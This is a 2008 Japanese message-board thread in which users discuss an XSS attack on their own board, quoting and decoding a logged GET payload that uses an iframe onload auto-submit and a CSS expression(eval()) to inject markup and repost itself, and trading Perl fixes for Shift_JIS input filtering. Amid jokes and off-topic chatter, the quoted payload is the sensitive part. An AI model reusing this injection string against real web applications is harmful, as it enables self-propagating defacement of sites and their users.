> > というかそうはなってないでしょ(;´Д`)
> > GETで投稿できたらどんな馬鹿掲示板だよそれ
> http://qwerty.on.arena.ne.jp/cgi-bin/bbs.cgi?u=baka
> こういうことです

出力はしてるけど投稿じゃないでしょ

参考：2008/09/27(土)05時28分32秒

えここは朝から変態だなあ(;´Д`)

> > Cookieによるﾊﾝﾄﾞﾙ表示はやめるってことかね(;´Д`)
> 俺も前まで勘違いしてたんだが
> くずははCookie使ってないんだわ
> ただ投稿時の名前を保持してるだけ

まじで(;´Д`)

参考：2008/09/27(土)05時27分42秒

> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > name=mmm+src=http://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> > l=String.fromCharCode(60);
> > r=String.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> > u.value+r;
> > document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> > }
> で、これが変数に見えるかね？

変数っていうかソースコードに見えます
実行して内部で乱数で数字作っているような

参考：2008/09/27(土)05時26分03秒

> ああ眠い寝る
> 薬ぬんだ
> 寝る
> おやしみ(;´Д`)ｷﾗｯ☆ﾐ

今起きた(;´Д`)U2がこんな時間に起きてるってどういうことよ

参考：2008/09/27(土)05時25分00秒

> > これが楽そうだな(;´Д`)GETで投稿受け付けなきゃいいんだ
> というかそうはなってないでしょ(;´Д`)
> GETで投稿できたらどんな馬鹿掲示板だよそれ

http://qwerty.on.arena.ne.jp/cgi-bin/bbs.cgi?u=baka
こういうことです

参考：2008/09/27(土)05時26分47秒

> > ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> > GETの場合保持しない(表示しない)ってのがいいと思うが
> Cookieによるﾊﾝﾄﾞﾙ表示はやめるってことかね(;´Д`)

俺も前まで勘違いしてたんだが
くずははCookie使ってないんだわ
ただ投稿時の名前を保持してるだけ

参考：2008/09/27(土)05時26分15秒

> > えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> name=mmm+src=http://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> l=String.fromCharCode(60);
> r=String.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> u.value+r;
> document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> }

つまりコードをGETで渡されてうかつにも実行しちゃったって事？

参考：2008/09/27(土)05時22分23秒

しかしえここのｴﾛｱﾆﾒ転送はせっかくのｼｮﾀなのにたまにﾔｸｻﾞ声が聞こえてきて怖い(;´Д`)

> > ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> > GETの場合保持しない(表示しない)ってのがいいと思うが
> これが楽そうだな(;´Д`)GETで投稿受け付けなきゃいいんだ

というかそうはなってないでしょ(;´Д`)
GETで投稿できたらどんな馬鹿掲示板だよそれ

参考：2008/09/27(土)05時24分56秒

> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> > 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)
> ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> GETの場合保持しない(表示しない)ってのがいいと思うが

Cookieによるﾊﾝﾄﾞﾙ表示はやめるってことかね(;´Д`)

参考：2008/09/27(土)05時22分57秒

> > えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> name=mmm+src=http://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> l=String.fromCharCode(60);
> r=String.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> u.value+r;
> document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> }

で、これが変数に見えるかね？

参考：2008/09/27(土)05時22分23秒

> ああ俺もクアッドほしいなあ(;´Д`)
> 転送したいなあ
> ｸｱｯﾄﾞ買おう

漏れもｸｱｯﾄﾞとかｵｸﾀとかほしいけど液晶ﾀﾌﾞﾚｯﾄもほしい(;´Д`)

参考：2008/09/27(土)05時22分53秒

> ああ眠い寝る
> 薬ぬんだ
> 寝る
> おやしみ(;´Д`)ｷﾗｯ☆ﾐ

ｲﾗｯ(;´Д`)

参考：2008/09/27(土)05時25分00秒

> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> > 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)
> これはどうよ(;´Д`)
> http://d.hatena.ne.jp/tociyuki/20060923/1158984768

Jcode.pmに置き換えるのが簡単ならそれが一番ｽﾏｰﾄかな(;´Д`)

参考：2008/09/27(土)05時23分40秒

> まぁ今回のｱｲﾄﾞﾙﾗﾝｸｱｯﾌﾟはｽｸﾘﾌﾟﾄ投稿した香具師とえじじ！とﾑｷｰの絵描きだな(;´Д`)お疲れ様でした。

暫定対策しかしてない人より最終的にI_RCで対策考えた住人も評価しようよ(;´Д`)

参考：2008/09/27(土)05時19分28秒

ああ眠い寝る
薬ぬんだ
寝る
おやしみ(;´Д`)ｷﾗｯ☆ﾐ

> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> > 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)
> ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> GETの場合保持しない(表示しない)ってのがいいと思うが

これが楽そうだな(;´Д`)GETで投稿受け付けなきゃいいんだ

参考：2008/09/27(土)05時22分57秒

> > ケチ(;´Д`)
> えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、

ほえ？
%3d が "=" の３文字になるの？(;´Д`)それとも=１文字？

参考：2008/09/27(土)05時16分48秒

> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> > 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)
> ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> GETの場合保持しない(表示しない)ってのがいいと思うが

うん(;´Д`)でもそれだとｿｰｽの改変箇所が多くなりそうっつーか
現状どうなってるかが分からないので手を出したくなかった

参考：2008/09/27(土)05時22分57秒

> > 確かにごり押しだな(;´Д`)ｽﾏｰﾄじゃない
> 綺麗にしてください(;´Д`)
> 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)

これはどうよ(;´Д`)
http://d.hatena.ne.jp/tociyuki/20060923/1158984768

参考：2008/09/27(土)05時19分28秒

> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> > 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)
> ツーか深海版ｿｰｽがないと修正してもどっかに問題でそう。
> 変数とか変に宣言しててぶつかって動かなくなりましたとか・・・

じゃあ$tmpじゃなくて$allyourbasearebelongtousとかにしておいてください(;´Д`)
まあﾃﾞｺｰﾄﾞ処理はたぶん手を加えてないだろうし
くずはのままなら独立したｻﾌﾞﾙｰﾁﾝだろうから問題ないんじゃね？

参考：2008/09/27(土)05時20分29秒

> > 確かにごり押しだな(;´Д`)ｽﾏｰﾄじゃない
> 綺麗にしてください(;´Д`)
> 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)

ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
GETの場合保持しない(表示しない)ってのがいいと思うが

参考：2008/09/27(土)05時19分28秒

ああ俺もクアッドほしいなあ(;´Д`)
転送したいなあ
ｸｱｯﾄﾞ買おう

> > ケチ(;´Д`)
> えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、

mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
mm.document.forms[0].submit();
name=mmm+src=http://qwerty.on.arena.ne.jp
/cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
l=String.fromCharCode(60);
r=String.fromCharCode(62);
ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
u.value+r;
document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
}

参考：2008/09/27(土)05時16分48秒

これがうわさのやくざ声か(;´Д`)
初めて聞いた
怖すぎる

> > 確かにごり押しだな(;´Д`)ｽﾏｰﾄじゃない
> 綺麗にしてください(;´Д`)
> 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)

ツーか深海版ｿｰｽがないと修正してもどっかに問題でそう。
変数とか変に宣言しててぶつかって動かなくなりましたとか・・・

参考：2008/09/27(土)05時19分28秒

> まぁ今回のｱｲﾄﾞﾙﾗﾝｸｱｯﾌﾟはｽｸﾘﾌﾟﾄ投稿した香具師とえじじ！とﾑｷｰの絵描きだな(;´Д`)お疲れ様でした。

深海さんの本性もちょっと面白かった(;´Д`)

参考：2008/09/27(土)05時19分28秒

> > りみくすみたいな会話はやめろよ(;´Д`)
> > あとなんでいまさらURAを？
> ちなみに最初のほうでURAって書いた漏れは「う…うんまあ(;´Д`)そうとも言うかも」って
> ﾚｽしたあと呆然と成行を見ているよ(;´Д`)ｲﾝﾀｰﾈｯﾄって怖いところだなあ

2ﾚｽ目からはﾏｯﾁﾎﾟﾝﾌﾟっぽいな(;´Д`)災難ね

参考：2008/09/27(土)05時18分03秒

闘神伝URA

> > チコというから二十面相かと思ったらエロアニメだった(;´Д`)
> 二十面相はﾁｺからおじさん呼ばわりされて正直ちょっとｲﾗｯときてると思う(;´Д`)お兄さんだろって

おじさまだとちょっと勃起しちゃうけどな

参考：2008/09/27(土)05時19分01秒

> > 自己ﾚｽ
> > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack ( "C", hex ( $1 ) )/eg;
> > &jcode'convert ( *value, 'sjis' );
> > の直後に以下のｺｰﾄﾞでとりあえず回避できるかな(;´Д`)
> > $&とかsubstr()とかﾁｮｰﾀﾞｻｲので何とかしたいけど眠いのでもういいや
> > my $tmp = $value;
> > $value = '';
> > while (length($tmp)) {
> >   if ($tmp =~ /^([\x09\x0A\x0D\x20-\x7E\xA1-\xDF]|[\x81-\x9F\xE0-\xEF][\x40-\x7E\x80-\xFC])+/) {
> >     $value = $&;
> >     substr($tmp,0,length($&)) = '';
> >   } else {
> >     substr($tmp,0,1) = '';
> >   }
> > }
> 確かにごり押しだな(;´Д`)ｽﾏｰﾄじゃない

綺麗にしてください(;´Д`)
何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)

参考：2008/09/27(土)05時16分57秒

まぁ今回のｱｲﾄﾞﾙﾗﾝｸｱｯﾌﾟはｽｸﾘﾌﾟﾄ投稿した香具師とえじじ！とﾑｷｰの絵描きだな(;´Д`)お疲れ様でした。

> チコというから二十面相かと思ったらエロアニメだった(;´Д`)

二十面相はﾁｺからおじさん呼ばわりされて正直ちょっとｲﾗｯときてると思う(;´Д`)お兄さんだろって

参考：2008/09/27(土)05時17分37秒

> > まだ怒ってる(;´Д`)余程URAが気に入っている模様
> りみくすみたいな会話はやめろよ(;´Д`)
> あとなんでいまさらURAを？

ちなみに最初のほうでURAって書いた漏れは「う…うんまあ(;´Д`)そうとも言うかも」って
ﾚｽしたあと呆然と成行を見ているよ(;´Д`)ｲﾝﾀｰﾈｯﾄって怖いところだなあ

参考：2008/09/27(土)05時15分47秒

チコというから二十面相かと思ったらエロアニメだった(;´Д`)

> > まだ試してない(;´Д`)
> > とりあえず
> > &jcode'convert ( *value, 'sjis' );
> > の後に$valueを先頭から走査して正しくない文字を除去するｺｰﾄﾞを追加する
> > とかでできないかな？
> > ｿｰｽ変更が簡単にできそうなので(;´Д`)
> 自己ﾚｽ
> $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack ( "C", hex ( $1 ) )/eg;
> &jcode'convert ( *value, 'sjis' );
> の直後に以下のｺｰﾄﾞでとりあえず回避できるかな(;´Д`)
> $&とかsubstr()とかﾁｮｰﾀﾞｻｲので何とかしたいけど眠いのでもういいや
> my $tmp = $value;
> $value = '';
> while (length($tmp)) {
>   if ($tmp =~ /^([\x09\x0A\x0D\x20-\x7E\xA1-\xDF]|[\x81-\x9F\xE0-\xEF][\x40-\x7E\x80-\xFC])+/) {
>     $value = $&;
>     substr($tmp,0,length($&)) = '';
>   } else {
>     substr($tmp,0,1) = '';
>   }
> }

確かにごり押しだな(;´Д`)ｽﾏｰﾄじゃない

参考：2008/09/27(土)05時12分50秒

> > ならば今はお休みなさいませ(;´Д`)
> ケチ(;´Д`)

えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、

参考：2008/09/27(土)05時15分55秒

> > まだ怒ってる(;´Д`)余程URAが気に入っている模様
> りみくすみたいな会話はやめろよ(;´Д`)
> あとなんでいまさらURAを？

URA信者が烈火するから

参考：2008/09/27(土)05時15分47秒

> > URIｴﾝｺｰﾄﾞがわからない(;´Д`)
> ならば今はお休みなさいませ(;´Д`)

ケチ(;´Д`)

参考：2008/09/27(土)05時15分11秒

> > 君の？
> まだ怒ってる(;´Д`)余程URAが気に入っている模様

りみくすみたいな会話はやめろよ(;´Д`)
あとなんでいまさらURAを？

参考：2008/09/27(土)05時12分33秒

> > まだ怒ってる(;´Д`)余程URAが気に入っている模様
> 気に入ってると怒るの？何で？

こういうバカは放置するしかないな

参考：2008/09/27(土)05時14分20秒

> > 誰もなにもしゃべんない(;´Д`)
> #上海
> こっちは流れてるな

誰がいるかわからなくて怖いからﾘｽﾄｱﾌﾟ(;´Д`)

参考：2008/09/27(土)03時59分38秒

> > "http ... +%81”までをメモ帳にはっつけ;で改行してURIｴﾝｺｰﾄﾞ文字列をﾃﾞｺｰﾄﾞしてからもう一度同じ質問をしてください(;´Д`)
> URIｴﾝｺｰﾄﾞがわからない(;´Д`)

ならば今はお休みなさいませ(;´Д`)

参考：2008/09/27(土)05時11分04秒

> > ポインタなんてチョ→楽だよ(;´Д`)
> > 単なるアドレスだ
> > 実社会で言えば物を送るのではなく「ここに置いてあるよ！」って手紙を届けるだけ
> というかﾘﾌｧﾚﾝｽとﾎﾟｲﾝﾀはそうかわらんよ。

ﾎﾟｲﾝﾀにNULL入れてｽｲｯﾁﾌﾗｸﾞ代わりに使いまくってたのでﾘﾌｧﾚﾝｽは嫌いだった(;´Д`)

参考：2008/09/27(土)05時11分06秒

> > 君の？
> まだ怒ってる(;´Д`)余程URAが気に入っている模様

気に入ってると怒るの？何で？

参考：2008/09/27(土)05時12分33秒

荒らし対策できたと思ったら今度はりみくすの妖怪ﾎｰﾀﾞｲか

> > じゃあJcode.pmはどうよ(;´Д`)
> > 一緒？
> まだ試してない(;´Д`)
> とりあえず
> &jcode'convert ( *value, 'sjis' );
> の後に$valueを先頭から走査して正しくない文字を除去するｺｰﾄﾞを追加する
> とかでできないかな？
> ｿｰｽ変更が簡単にできそうなので(;´Д`)

自己ﾚｽ
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack ( "C", hex ( $1 ) )/eg;
&jcode'convert ( *value, 'sjis' );
の直後に以下のｺｰﾄﾞでとりあえず回避できるかな(;´Д`)
$&とかsubstr()とかﾁｮｰﾀﾞｻｲので何とかしたいけど眠いのでもういいや

my $tmp = $value;
$value = '';
while (length($tmp)) {
  if ($tmp =~ /^([\x09\x0A\x0D\x20-\x7E\xA1-\xDF]|[\x81-\x9F\xE0-\xEF][\x40-\x7E\x80-\xFC])+/) {
    $value = $&;
    substr($tmp,0,length($&)) = '';
  } else {
    substr($tmp,0,1) = '';
  }
}

参考：2008/09/27(土)04時56分33秒

> > 怒りが収まらなくなった模様
> 君の？

まだ怒ってる(;´Д`)余程URAが気に入っている模様

参考：2008/09/27(土)05時10分18秒

えここでエロアニメﾊｼﾞﾏﾀ(;´Д`)

> > perlしかわからない漏れからすると凄いよ
> > ポインタとかわかんね
> ポインタなんてチョ→楽だよ(;´Д`)
> 単なるアドレスだ
> 実社会で言えば物を送るのではなく「ここに置いてあるよ！」って手紙を届けるだけ

というかﾘﾌｧﾚﾝｽとﾎﾟｲﾝﾀはそうかわらんよ。

参考：2008/09/27(土)05時08分43秒

> > じゃあ↓の場合は2行目から12行目までが"で括られているから長い文字列だよね？
> > GETで渡された文字列に変数名みたいのが入ってるって事？
> > -------------------------
> > "GET /cgi-bin/bbs.cgi? HTTP/1.1" 200 5486 
> > "http://qwerty.on.arena.ne.jp/cgi-bin/bbs.cgi?mode=i&d=30&i=a&
> > u=iframe+onload%3dmmm.document.forms[0].v.value%3dMath.floor(Math.random()*65536);
> > mm.document.forms[0].submit();+name%3dmmm+src%3dhttp://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value%3d%3d30)
> > {l%3dString.fromCharCode(60);r%3dString.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML%3dl%2bdocument.forms[0].
> > u.value%2br;document.forms[0].d.value%3d123}&c=+style%3d{a:expression(eval(document.forms[0].count.value))}+%81" 
> > "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
> > -------------------------
> "http ... +%81”までをメモ帳にはっつけ;で改行してURIｴﾝｺｰﾄﾞ文字列をﾃﾞｺｰﾄﾞしてからもう一度同じ質問をしてください(;´Д`)

URIｴﾝｺｰﾄﾞがわからない(;´Д`)

参考：2008/09/27(土)05時09分55秒

> > perlしかわからない漏れからすると凄いよ
> > ポインタとかわかんね
> ポインタなんてチョ→楽だよ(;´Д`)
> 単なるアドレスだ
> 実社会で言えば物を送るのではなく「ここに置いてあるよ！」って手紙を届けるだけ

誰でも入れられるようにしたらﾀﾞｲﾚｸﾄﾒｰﾙで溢れてな(;´Д`)

参考：2008/09/27(土)05時08分43秒

> > 君は馬鹿なのに馬鹿って言われた事が無いの？
> 怒りが収まらなくなった模様

君の？

参考：2008/09/27(土)04時59分26秒